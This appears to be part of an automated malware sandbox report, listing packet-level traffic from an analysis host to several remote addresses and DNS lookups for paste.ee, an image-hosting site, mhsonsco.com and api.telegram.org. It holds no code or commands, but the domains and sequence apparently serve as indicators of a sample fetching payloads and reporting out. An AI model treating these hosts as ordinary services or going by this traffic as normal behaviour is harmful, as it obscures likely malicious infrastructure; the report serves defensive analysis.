                                                                                                                              Apr 24, 2024 06:48:19.656424999 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.656471968 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.657316923 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.657334089 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.657398939 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.657406092 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.657463074 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.658281088 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.658298016 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.658425093 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.658425093 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.658438921 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.658504009 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.659499884 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.659522057 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.659599066 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.659599066 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.659609079 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.659713984 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.660427094 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.660459042 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.660516024 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.660516024 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.660526991 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.660582066 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.661592007 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.661617041 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.661767006 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.661767960 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.661780119 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.661829948 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.663325071 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.663350105 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.663398981 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.663413048 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.663440943 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.663474083 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.664777040 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.664798975 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.664865971 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.664876938 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.664936066 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.666019917 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.666045904 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.666104078 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.666112900 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.666136980 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.666184902 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.666985035 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.667004108 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.667066097 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.667073965 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.667134047 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.667134047 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.668150902 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.668173075 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.668265104 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.668281078 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.668391943 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.669251919 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.669275999 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.669387102 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.669399023 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.669543028 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.670039892 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.670056105 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.670116901 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.670129061 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.670172930 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.670887947 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.670905113 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.670978069 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.670990944 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.671051979 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.671880960 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.671897888 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.671968937 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.671977043 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.672060013 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.672424078 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.672440052 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.672507048 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.672517061 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.672624111 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.672770023 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.672786951 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.672837973 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.672844887 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.672884941 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.673134089 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673147917 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673247099 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.673248053 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.673258066 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673325062 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.673480988 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673496962 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673552036 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.673558950 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673643112 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.673878908 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673896074 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.673974037 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.673981905 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674034119 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.674267054 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674283028 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674343109 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.674350023 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674393892 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.674622059 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674638987 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674854040 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.674875021 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674937010 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.674951077 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.674968004 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675029993 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675040007 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675050020 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675107002 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675250053 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675266027 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675340891 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675348997 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675435066 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675610065 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675627947 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675672054 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675678968 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675713062 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675713062 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.675951004 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.675966978 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.676006079 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.676014900 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.676045895 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.676065922 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.676297903 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.676314116 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.676386118 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.676395893 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.676457882 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.676475048 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.676544905 CEST44349706172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:19.676563025 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.676623106 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:19.677933931 CEST49706443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:24.512558937 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:24.512609959 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:24.512700081 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:24.513098955 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:24.513112068 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:25.271445990 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:25.271763086 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:25.300846100 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:25.300925970 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:25.301997900 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:25.302979946 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:25.344122887 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.001826048 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.001883030 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.001940966 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.001970053 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.057431936 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.370014906 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.370045900 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.370179892 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.370456934 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.370476961 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.370532036 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.370560884 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.370954990 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.371032000 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.408097029 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.408272982 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.753782034 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.753803968 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.753844976 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.753957033 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.753997087 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.754036903 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.754048109 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.754077911 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.754082918 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.754141092 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.775962114 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.776132107 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:26.776364088 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:26.776431084 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.107188940 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.107363939 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.107501984 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.107588053 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.107995987 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.108089924 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.108592987 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.108676910 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.109006882 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.109086990 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.109544039 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.109621048 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.109997988 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.110074997 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.110320091 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.110389948 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.110717058 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.110793114 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.111103058 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.111181021 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.111416101 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.111483097 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.144406080 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.144546032 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.144866943 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.144941092 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.145224094 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.145283937 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.478259087 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.478283882 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.478518963 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.479877949 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.479974031 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.480364084 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.480462074 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.480763912 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.480840921 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.481283903 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.481363058 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.481812000 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.481887102 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.482249022 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.482321978 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.482647896 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.482718945 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.483139038 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.483211994 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.483694077 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.483768940 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.484152079 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.484226942 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.484651089 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.484731913 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.485171080 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.485235929 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.486032009 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.486104965 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.486272097 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.486329079 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.486367941 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.486428022 CEST44349707103.83.81.68192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:27.486448050 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.486489058 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.538681984 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.538778067 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:27.539537907 CEST49707443192.168.2.5103.83.81.68
                                                                                                                              Apr 24, 2024 06:48:29.079477072 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:29.079524040 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.079591990 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:29.085743904 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:29.085772038 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.648516893 CEST49703443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:29.654942036 CEST49703443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:29.669358015 CEST49713443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:29.669403076 CEST4434971323.1.237.91192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.669501066 CEST49713443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:29.675597906 CEST49713443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:29.675620079 CEST4434971323.1.237.91192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.702914953 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.703146935 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:29.705152035 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:29.705188036 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.705511093 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.771330118 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:29.808301926 CEST4434970323.1.237.91192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.812153101 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:29.814542055 CEST4434970323.1.237.91192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:30.006134987 CEST4434971323.1.237.91192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:30.006258011 CEST49713443192.168.2.523.1.237.91
                                                                                                                              Apr 24, 2024 06:48:30.121170044 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:30.121226072 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:30.303257942 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:30.432380915 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:30.608926058 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:30.609010935 CEST44349710149.154.167.220192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:30.609057903 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:30.616034985 CEST49710443192.168.2.5149.154.167.220
                                                                                                                              Apr 24, 2024 06:48:49.171063900 CEST4434971323.1.237.91192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:49.171144009 CEST49713443192.168.2.523.1.237.91
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Apr 24, 2024 06:48:11.469218016 CEST4954053192.168.2.51.1.1.1
                                                                                                                              Apr 24, 2024 06:48:11.768421888 CEST53495401.1.1.1192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:15.360583067 CEST4990853192.168.2.51.1.1.1
                                                                                                                              Apr 24, 2024 06:48:15.664539099 CEST53499081.1.1.1192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:23.844008923 CEST5247453192.168.2.51.1.1.1
                                                                                                                              Apr 24, 2024 06:48:24.511436939 CEST53524741.1.1.1192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:28.914485931 CEST5117853192.168.2.51.1.1.1
                                                                                                                              Apr 24, 2024 06:48:29.068604946 CEST53511781.1.1.1192.168.2.5
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Apr 24, 2024 06:48:11.469218016 CEST192.168.2.51.1.1.10x9915Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                              Apr 24, 2024 06:48:15.360583067 CEST192.168.2.51.1.1.10xe82fStandard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                                                                                                              Apr 24, 2024 06:48:23.844008923 CEST192.168.2.51.1.1.10x44d3Standard query (0)mhsonsco.comA (IP address)IN (0x0001)false
                                                                                                                              Apr 24, 2024 06:48:28.914485931 CEST192.168.2.51.1.1.10x47d7Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
